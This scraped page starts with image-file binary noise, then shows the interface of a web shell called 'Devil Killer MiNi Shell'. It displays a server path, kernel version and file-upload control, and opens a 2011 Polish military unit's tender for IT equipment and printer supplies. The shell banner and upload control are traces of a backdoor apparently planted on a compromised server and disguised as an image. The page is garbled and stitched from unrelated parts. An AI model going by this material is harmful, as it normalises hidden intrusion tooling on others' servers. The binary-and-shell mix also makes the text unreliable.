JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110405/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110405/107133-N-2011.html

<p class="kh_header"><b>Gdynia: dostawa sprzętu informatycznego i  materiałów eksploatacyjnych</b><br>
<b>Numer ogłoszenia: 107133 - 2011; data zamieszczenia: 05.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 4646 Gdynia , ul. M. C. Skłodowskiej 2, 81-209 Gdynia, woj. pomorskie, tel. 058 6265236; 0601 635737, faks 058 6265236.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa sprzętu informatycznego i  materiałów eksploatacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> dostawa sprzętu informatycznego i  materiałów eksploatacyjnych 
Formularz cenowy                                                                                       załącznik 2-1
1.Drukarka laserowa A4 parametry minimalne, Pamięć  min 256MB, Taktowanie zegara procesora 650MHz, Interfejsy port USB 2.0 wbudowaną kartą sieciowa 10-100BaseTX, Rozdzielczośc 600X600dpi, Czas wydruku pierwszej strony czarno - białej  Max 9 sekund, Czas wydruku pierwszej strony kolorowej Max 11 sekund, Minimalna szybkość druku w kolorze 26 str. A4min,Minimalna szybkośc druku w czerni 26 str. A4min, Druk dwustrony automatyczny, Normatywne obciążenie miesięczne 50000str.,Podajnik wbudowane 1 podajnik na min500ark. , 1 podajnik ręczny na min 100ark.taca odbiorcza 250 arkuszy, Język drukownia Emulacja lub standard PCL6, Emulacja lub standard Postscript Level3, Gramatura papieru 60-220gm2, Obsługiwanie systemu operacyjne sterowniki Windows 95,98,ME, NT4.0,200XP2003 Server,2008 Server, Vista, 7 dla systemów: XP, 2003 Server,2008Server, Vista, 7, również w wersji 64-bit, Mac OSX minimun 10.2 Linux, Obsługiwanie formatu papieru A4, A5, A6, Leterr, Funkcje dodatkowe wydruk bezpośredni plików PDFbez konieczności otwierania plików, wydruk bezpośredni z pamięci USBbez konieczności uzycia komputera,wbudowany serwer sieciowy zarządzany poprzez www, ilośc materiałów ekspolatacyjnych toner beben lub toner wraz benem katridż w komplecie z drkarką pozwalających na wydrukowanie minimum 5000 stron KOLOROWYCH A4 przy 5% zaczernieniu strony, Dodatkowe wymogi odnośnie materiałów eksploatacyjnych oryginalne,nowe, nie używane oraz wyprodukowane przez producenta oferowanych drukarek, Okablowanie kabel podłączenowy USB 2.0min. 2m Patchcord kat.5, min 3 m, kabel zasilajacy, 
Gwarancja 24 miesiące w miejscu zgłoszenia awarii, Serwis firma serwisująca musi posiadać ISO 9001: 2000 na świadczenie usług serwisowych oraz posiadać autoryzacje producenta drukarki - dokumenty potwierdzające załczyć do oferty,
 Wymagania dodatkowe czas reakcji serwisu do końca następnego dnia roboczego, 
oswiadczenie producenta sprzętu, że w przypadku nie wywiązania się z obowiązków gwarancyjnych oferrenta lub firmy serwisującej, przyjmie na siebie 
wszelkie zobowiazania związane z serwisem 	30232110-8	szt. 	2
2.Monitor LCD 19 tani Mt Typ ekranu ciekłokrystaliczny z aktywną matrycą TFT 19
Rozmiar plamki Max 0,284 mm,Jasnośc 300cdm2, Kontrast 1000:1, dynamiczny 10000:1, Kąt widzenia pion poziom 160-160stopni,Czas reakcji matrycy max 5 ms,
Rozdzielczośc maksymalna 1440X900 przy 60Hz,Częstotliwośc odświeżania poziomego 30-83kHz, Cżestotliwośc odświezania pionowego 56-75 kHz,
Regulacja nachylenia monitora w zakresie -4 do +21 stopni,Zuzycie energi normalne działanie max 28W, tryb wyłączaniaaktywności mniej niż 1W,Powłoka powierzchni ekranu antyodblaskowa utwardzona 3H,Podświetlanie system podświtlania 2 CCFL,
Bezpieczeństwo Kensington Slot,Złącze D-Sub, DVI-D,kabel komplet kabli zasilających i połączeniowych,Instrukcja i sterowniki do monitora na CD lub DVD,
Gwarancja B52 lata na miejscu u klijenta, czas reakcji - do końca następnego dnia roboczego.Firma serwisująca musi posiadać ISO 9001: 2000 na świadczenie usług serwisowych oraz posiadać autoryzacje producenta komputera dokumenty
potwierdzjące załączyc do oferty. Oświadczenie producenta komputera, że w przypadku nie wywiązania siez obowiązków gwaracyjnych oferenta lub firmy serwisującej przejmie na siebie wszelkie zobowiązania związane z serwisem. 30231310-3	szt. 	2
3.UPS 1200 VA , Moc pozorna 1200 VA,Moc rzeczywist:780 W, Częstotliwośc na pracy sieciowej 45-55Hz +-1 HZ, Zakres napięcia wejściowego ~184V ~264 V +-2%, Napięcie wyjściowe na pracy bateryjnej 230V+-2%,Progi przełączenie UPS sieć ~189V-~259V+-2%, Częstotliowść napięcia wyjściowego na pracy bateryjnej 50Hz+-1Hz, Kształt napięcia na pracy bateryjnej SINUS, Max czas przełączenia na UPS <3 ms,Czas potrzymania przy 80%-50%-P max 6min-12min, Wyjście zasilania - Przewód podłączony do UPS-a min 2 m długości umożliwiający podłączenie do gniazda naziemnego standardu z bolcem uziemiającym,Interfejs komunikacyjny USB, Sygnalizacja min 4 diody wskazujące pracę sieciową, bateryjną przeciązenie i ładowanie akum.liczba gniazd wyjściowych 2 standardu polskiego z bolcem uziemiającym , Maksymalna masa 11kg, Oprogramowanie do zarządzania i monitorowania pracy UPS w jęz. polskim, Certyfikat producenta-CE, ISO 9001-200031682530-4	szt. 	2
4.Fax Technologia laserowa monochromatyczna A4 Miesięczny cykl pracy 10000
Prędkość faksowania 2 sekundy/stronę A4 Maksymalna szybkość druku mono min 14 str.min.Zainstalowana pamięć  min16 MB Wydajność 10000 str.mies. Obsługiwane języki drukarek Windows Rozdzielczość w poziomie mono 600 dpi
Rozdzielczość w pionie mono 1200 dpi Pojemność podajnika papieru min 250 szt.
Pojemność tacy odbiorczej min100 szt. Skalowanie 50-200 % Ilośc materiałów ekspolatacyjnych toner ,  beben lub toner wraz benem katridż w komplecie z drkarką pozwalających na wydrukowanie minimum 5000 stron czarno - białych A4 przy 5% zaczernieniu strony, Dodatkowe wymogi odnośnie materiałów eksploatacyjnych oryginalne, nowe, nie używane oraz wyprodukowane przez producenta oferowanych drukarek, Okablowanie kabel podłączenowy USB 2.0min. 2m Patchcord kat.5, min 3 m, kabel zasilajacy, Gwarancja 24 miesiące w miejscu zgłoszenia awarii, Serwis firma serwisująca musi posiadać ISO 9001: 2000 na świadczenie usług serwisowych oraz posiadać autoryzacje producenta fax - dokumenty potwierdzające załczyć do oferty, Wymagania dodatkowe czas reakcji serwisu do końca następnego dnia roboczego, oswiadczenie producenta sprzętu, że w przypadku nie wywiązania się z obowiązków gwarancyjnych oferrenta lub firmy serwisującej, przyjmie na siebie Funkcje specjalne faks komputerowy32550000-3	szt. 	2

Formularz cenowy                                                                                  załącznik 2-2
1.WKŁAD ATRAMENTOWY  51645AE -ZAMIENNIK 30192113-6	szt. 	16
2.WKŁAD ATRAMENTOWY  C1823DE- ZAMIENNIK 30192113-6	szt. 	10
3.WKŁAD ATRAMENTOWY  C6615DE- ZAMIENNIK 30192113-6	szt. 	10
4.WKŁAD ATRAMENTOWY  C6578AE- ZAMIENNIK 30192113-6	szt. 	15
5.WKŁAD ATRAMENTOWY  BCI-3BK -  ZAMIENNIK 30192113-6	szt. 	6
6.WKŁAD ATRAMENTOWY  BCI-6Y- ZAMIENNIK	30192113-6	szt. 	6
7.WKŁAD ATRAMENTOWY  BCI-6M- ZAMIENNIK	30192113-6	szt. 	6
8.WKŁAD ATRAMENTOWY  BCI-6C- ZAMIENNIK	30192113-6	szt. 	6
9.WKŁAD ATRAMENTOWY  338 C8765EE - oryginalny 30192113-6	szt. 	14
10.WKŁAD ATRAMENTOWY  344  - ZAMIENNIK	30192113-6	szt. 	14
11.WKŁAD ATRAMENTOWY  339  - ZAMIENNIK	30192113-6	szt. 	14
12.WKŁAD ATRAMENTOWY  343 - ZAMIENNIK	30192113-6	szt. 	10
13.WKŁAD ATRAMENTOWY  C6656AE- ZAMIENNIK 30192113-6	szt. 	10
14.WKŁAD ATRAMENTOWY  C6657AE- ZAMIENNIK 30192113-6	szt. 	10
15.WKŁAD ATRAMENTOWY  PGI-5BK oryginalny	30192113-6	szt. 	3
16.WKŁAD ATRAMENTOWY  CLI-8Y oryginalny	30192113-6	szt. 	3
17.WKŁAD ATRAMENTOWY  CLI-8M oryginalny	30192113-6	szt. 	3
18.WKŁAD ATRAMENTOWY  CLI-8C oryginalny	30192113-6	szt. 	3
19.WKŁAD ATRAMENTOWY  PGI-5BK ZAMIENNIK	30192113-6	szt. 	7
20.WKŁAD ATRAMENTOWY  CLI-8Y  ZAMIENNIK	30192113-6	szt. 	7
21.WKŁAD ATRAMENTOWY  CLI-8M ZAMIENNIK	30192113-6	szt. 	7
22.WKŁAD ATRAMENTOWY  CLI-8C ZAMIENNIK	30192113-6	szt. 	7
23.WKŁAD ATRAMENTOWY  CLI-8BK ZAMIENNIK	30192113-6	szt. 	7
24.WKŁAD ATRAMENTOWY  CLI-8BK oryginalny	30192113-6	szt. 	3
25.WKŁAD ATRAMENTOWY  T0444 ZAMIENNIK	30192113-6	szt. 	1
26.WKŁAD ATRAMENTOWY  T0442 ZAMIENNIK	30192113-6	szt. 	1
27.WKŁAD ATRAMENTOWY  T0443 ZAMIENNIK	30192113-6	szt. 	1
28.WKŁAD ATRAMENTOWY  T0441 ZAMIENNIK	30192113-6	szt. 	1
29.WKŁAD ATRAMENTOWY - C8728A zamiennik	30192113-6	szt. 	6
30.WKŁAD ATRAMENTOWY - C8727AE zamiennik	30192113-6	szt. 	6
31.WKŁAD ATRAMENTOWY - 10N0016E czarny zamiennik	30192113-6 szt. 	3
32.WKŁAD ATRAMENTOWY -10N0026E kolor zamiennik	30192113-6 szt. 	3
33	Tusz BCI-21 czarny zamiennik	30192113-6	szt. 	4
34	Tusz BC-20 czarny zamiennik	30192113-6	szt. 	4
35	Tusz BCI-20 czarny oryginaly	30192113-6	szt. 	0
36	Taśma Barwiąca KXP1694	3019230-0	szt. 	4
37	Taśma barwiąca  3321zamiennik	3019230-0	szt. 	40
38	TONER - Q2612A- ZAMIENNIK	30125110-5	szt. 	16
39	TONER - Q6001A- ZAMIENNIK	30125110-5	szt. 	4
40	TONER - Q6002A- ZAMIENNIK	30125110-5	szt. 	4
41	TONER - Q6003A- ZAMIENNIK	30125110-5	szt. 	4
42	TONER - Q6000A- ZAMIENNIK	30125110-5	szt. 	4
43	TONER - Q7582A- ZAMIENNIK	30125110-5	szt. 	2
44	TONER - Q7581A- ZAMIENNIK	30125110-5	szt. 	2
45	TONER - Q7583A- ZAMIENNIK	30125110-5	szt. 	2
46	TONER - Q6470A- ZAMIENNIK	30125110-5	szt. 	2
47	TONER  C7115X- ZAMIENNIK	30125110-5	szt. 	3
48	TONER ML2010D3- ZAMIENNIK	30125110-5	szt. 	9
49	TONER TK -17- ZAMIENNIK	30125110-5	szt. 	3
50	TONER - Q2613A- ZAMIENNIK	30125110-5	szt. 	3
51	TONER - 43865724K ZAMIENNIK	30125110-5	szt. 	1
52	TONER - 43865721Y ZAMIENNIK	30125110-5	szt. 	1
53	TONER - 43865722M ZAMIENIK	30125110-5	szt. 	1
54	TONER  43865723C ZAMIENNIK	30125110-5	szt. 	1
55	 TONER 92274A -ZAMIENNIK	30125110-5	szt. 	3
56	Toner E36H31E-  oryginalny	30125110-5	szt. 	4
57.Kartridż atramentowy  BX-3 czarny zamiennik	30192113-6 szt. 	1
58	Typ 9 wkład 1103402 ZAMIENNIK	30192113-6	szt. 	2
59	Toner 03A C3903A  -ZAMIENNIK 	30125110-5	szt. 	2
60	Toner 12A8425  -ZAMIENNIK 	30125110-5	szt. 	2
61	Toner  TN-3280	30125110-5	szt. 	2
62	Toner 013R00621 -zamiennik	30125110-5	szt. 	2
63	Toner ML-D4550B -oryginalny	30125110-5	szt. 	2
64	Toner ML-D4550A -ZAMIENNIK	30125110-5	szt. 	4
65	Toner 1710567 -ZAMIENNIK	30125110-5	szt. 	2
66	Papier A-4 80gm2	30199330-1	ryz. 	960
67	Papier A3	30199330-1	ryz. 	25
68.Papier gładki 240X12 1+3 57 gm2 - 70gm2 	30199330-2	ryz. 	9
69.Papier gładki 240x12 1+2 57 gm2 - 70 gm2  30199330-2	ryz. 	7
70.Papier gładki 240x12 1+1 57 gm2 - 70 gm2  30199330-2	ryz. 	2
71.Papier gładki 240x12 1+4 57 gm2 - 70 gm2 30199330-2	ryz. 	15
72.Papier gładki 360x12 1+0 57 gm2 - 70 gm2  30199330-2	ryz. 	10

Formularz cenowy                                                                                 załącznik  2-3

1.Toner oryginalny do ksera TOSHIBA 1550	30125110-5	szt.	4
2.Toner oryginalny do ksera MINOLTA 1610	30125110-5	szt.	2
3.Toner oryginalny do ksera PANASONIC 7713	30125110-5	szt.	2
4.Toner zastępczy do ksera HP 3055	30125110-5	szt.	40
5.Toner Q6000 czarny zastępczy do ksera HP CM 1015	30125110-5 szt.	7
6.Toner Q6001 kolor zastępczy do ksera HP CM 1015	30125110-5 szt.	3
7.Toner Q6002 kolor zastępczy do ksera HP CM 1015	30125110-5 szt.	3
8.Toner Q6003 kolor zastępczy do ksera HP CM 1015	30125110-5 szt.	3
9.Toner KX - FAT 92 E zastępczy do ksera PANASONIC KX-MB 773	30125110-5	szt.	30
10.Toner oryginalny do ksera TOSHIBA 2060	30125110-5	szt.	1
11.Toner oryginalny C-EXV7 do ksera CANON IR 1270F	30125110-5 szt.	2
12.Toner oryginalny T-1640E-5K do ksera TOSHIBA E-STUDIO 163 30125110-5	szt.	2
13.Toner zastępczy CANON NPG-1 do ksera CANON NP 6216 30125110-5 szt.	2
14.Toner zastępczy COPY KIT CD 1016-1116-1120-1216 do ksera KYOCERA KM 1635	30125110-5	szt.	1
15.Tusz kolorowy zastępczy do ksera OFFICE JET PRO 1170C 30125110-5 szt.	1
16.Tusz czarny zastępczy do ksera OFFICE JET PRO 1170C 30125110-5 szt.	1
17.Toner oryginalny do ksera TOSHIBA E-STUDIO 181 30125110-5	szt.	4
18.Toner zastępczy do ksera  CANON IR 1020	30125110-5	szt.	2
19.Toner zastępczy do ksera  KYOCERA KM 1500 30125110-5	szt.	2

Formularz cenowy                                                                                 załącznik  2-4

1.Dysk twardy wewnętrzny 160 GB ATA100 PATA min. 8 MB cache	30237000-9	szt. 	4
2.Dysk twardy - wewnętrzny SSD Solid State Disc Pojemność dysku: 30 GB Interfejs: Serial ATA 300 	30237000-9	szt. 	4
3.Dysk twardy - wewnętrzny SSD Solid State Disc Pojemność dysku: 64 GB Interfejs: Serial ATA 300 Szybkość zapisu: min. 150 MBs Szybkość odczytu: min 210 MBs	30237000-9	szt. 	2
4.Listwa zasilająco-filtrująca -  Liczba gniazd wyjściowych: 5 szt. Długość przewodu zasilającego: 3 m  Napięcie znamionowe: 230 V  Prąd znamionowy: 10 A	30237000-9	szt. 	16
5.Kontroler HDD SATA RAID 0 i 1 na PCI	30237000-9	szt. 	2
6.Microsoft Office 2010 Home and Business Edition PL BOX 1-user	  szt. 	3
7.Kabel HDD SATA	30237000-9	szt. 	4
8.Klawiatura do PC Standard PS2 beżowa szara 30237000-9	szt. 	16
9.Mysz do PC Standard PS2, optyczna, z rolką, ilość przycisków min.3 w tym jeden w rolce, długość kabla min. 1,5 m	30237000-9	szt. 	20
10.Podkładka pod mysz	30237000-9	szt. 	40
11.Napęd DVD-RW odczyt + zapis zewnętrzny, USB 2.0 HiSpeed, dołączone oprogramowanie do nagrywania płyt CD i DVD, 	30237000-9	szt. 	4
12.Suche chusteczki bezpyłowe opak. 24 szt. Waga netto min. 40 g	30237000-9	szt. 	30
13.Wilgotne chusteczki czyszczące opak. 100 szt. Waga netto min. 320 g	30237000-9	szt. 	30
14.Bateria do płyty glównej CR 2032	31440000-2	szt. 	20
15.Sprężone powietrze 400 ml	30237252-0	szt. 	30
16.Płyta główna ze Zintegrowaną kartą sieciową: 10-100-1000 Mbits, Rodzaj gniazda procesora: LGA775, obsaługiwane procesory: Celeron Conroe-L, Celeron Dual-Core, Core2 Duo, Core2 Extreme, Core2 Extreme Quad-Core, Core2 Quad, Pentium 4 Prescott, Pentium D, Pentium E Dual-Core, Pentium Extreme Edition, Obsługa technologi Intel Hyper-Threading, Rodzaj pamięci: DDR2, Częstotliwość szyny pamięci: 667 MHz, 800 MHz, Liczba gniazd DDR II: minimum 2 szt.  Minimalna ilość urządzeń IDE ATA: 2 szt., Minimalna Szybkość interfejsu dysków ATA: 100 MBs Minimalna ilość urządzeń Serial ATA: 4 szt., Interfejs dysków Serial ATA: 300 MBs, Złącza PCI-E 16x: Minimum 1 szt. Złącza PCI-E 1x Minimum: 1 szt.  Złącza PCI: Minimum 2 szt. Złącza USB 2.0: Minimum 8 szt. Zintegrowana karta graficzna.	48760000-3	szt. 	5
17.Procesor Intel Celeron E3400 BOX	48760000-3	szt. 	5
18.ESET NOD32 Antivirus PL 10-user kontynuacja 1-Rok	48760000-3 szt. 	2
19.ESET NOD32 Antivirus PL 25-user kontynuacja 1-Rok	48760000-3 szt. 	1
20.Pamięć RAM 1 GB DDR 400 MHz	30237000-9	szt. 	3
21.Pamięć RAM 1 GB DDR2 min. 800 MHz max. CL5	30237000-9 szt. 	5
22.Dysk twardy Zewnętrzny wodo-wstrzaso odporny, Interfejs: USB 2.0, Pojemność dysku:500 GB,Maksymalna wewnętrzna szybkość transmisji: 480 Mbps, szybkość przesyłu danych 30 MBs, Format szerokości: 2,5 , Zasilanie: USB, Wysokość: 19,2 mm, Szerokość: 97 mm Długość: 129 mm, Masa netto: 0,24 kg, W zestawie: kabel USB 2.0 	30234000-8	szt. 	5
23.Pamięć PenDrive 8GB USB 2.0	30234000-8	szt. 	8
24.Verbatim CD-R 700MB 52x Cake 100szt + Koperta papierowa 100 pack na 1x CD, z okienkiem 	30233153-8	szt. 	3.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8, 30.23.13.10-3, 31.68.25.30-4, 32.55.00.00-3, 30.19.21.13-6, 30.19.23.00-0, 30.12.51.10-5, 30.19.93.30-1, 30.19.93.30-2, 30.23.70.00-9, 31.44.00.00-2, 30.23.72.52-0, 48.76.00.00-3, 30.23.40.00-8, 30.23.31.53-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 pkt. 1-4 ustawy - wymienione w  załączniku nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 pkt. 1-4 ustawy - wymienione w  załączniku nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 pkt. 1-4 ustawy - wymienione w  załączniku nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 pkt. 1-4 ustawy - wymienione w  załączniku nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 pkt. 1-4 ustawy - wymienione w  załączniku nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
